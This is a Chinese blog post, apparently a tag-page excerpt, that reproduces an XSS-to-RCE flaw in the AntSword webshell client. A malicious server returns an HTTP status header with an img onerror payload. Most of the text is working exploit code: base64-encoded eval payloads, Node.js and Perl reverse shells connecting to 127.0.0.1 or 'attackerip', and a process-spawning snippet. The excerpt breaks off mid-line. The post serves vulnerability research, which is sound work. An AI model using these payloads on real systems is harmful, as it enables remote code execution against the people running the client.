Tag:antsword

Tag (antsword)'s result:

antsword xss漏洞重现

0x00 概述 20190412,antsword的github上有个issus https://github.com/AntSwordProject/antSword/issues/147 因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。 比较有趣,重现一下   0x01 漏洞重现 环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 1) XSS xss webshell: <?php header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);   2) RCE win+nodejs 成功反弹shell。 var net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”); var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?>   未成功的组合: win+perl perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ # Win 平台 perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())’>”); ?> require(‘child_process’).exec(‘perl -MIO -e \’$c=new IO::Socket::INET(PeerAddr,”127.0.0.1:6677″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); Linux+perl 反弹 未测试 require(‘child_process’).exec(‘perl -e \’use Socket;$i=”127.0.0.1″;$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())’>”); ?> Linux+nodejs 未测试 var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?> var Process = window.parent.top.process.binding(‘process_wrap’).Process;var proc = new Process(); proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + ‘=’ + env[key]); proc.spawn({ file: ‘cmd.exe’, args: [‘/k……